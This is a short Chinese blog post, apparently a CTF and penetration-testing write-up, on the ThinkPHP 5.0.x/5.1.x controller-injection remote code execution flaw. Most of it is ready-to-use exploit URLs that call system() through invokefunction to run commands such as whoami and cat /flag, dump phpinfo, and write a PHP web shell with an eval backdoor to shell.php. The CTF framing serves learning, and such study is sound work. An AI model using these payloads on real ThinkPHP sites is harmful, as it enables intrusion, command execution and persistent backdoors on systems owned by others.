ThinkPHP漏洞利用

  • 漏洞标志
    ThinkPHP漏洞利用_第1张图片

  • 影响版本

ThinkPHP 5.0.x ~ 5.0.23
ThinkPHP 5.1.x ~ 5.1.31

  • 漏洞利用
    先查看版本号。在网址上随意输入一个不存在的模块 地址:
    ThinkPHP漏洞利用_第2张图片
    可以看到,thinkphp 版本为 5.0.20

查看信息
ThinkPHP漏洞利用_第3张图片

漏洞利用
大致原理:
漏洞程序未对控制器进行过滤,导致攻击者可以通过引入\符号来调用任意类方法。
详情参考:https://www.cnblogs.com/backlion/p/10106676.html
初步利用代码如下:

index.php?s=index/\namespace\class/method
这将会实例化\namespace\class类并执行method方法

远程代码执行命令:whoami(链接后面的whoami可以改成你要执行的命令,特殊符号请进行url转码)

http://xxx.xxx.xxx(这里为你的域名)/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

或者

/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php> -r ‘system(“cat /flag”);’

/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

通过phpinfo函数写出phpinfo的信息

http://xxx.xxx.xxx/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

写入shell

http://xxx.xxx.xxx/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_GET[%22snowwolf%22])?^%3E%3Eshell.php

显示phpinfo

http://xxx.xxx.xxx/public/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100

你可能感兴趣的:(CTF,安全相关,测试渗透)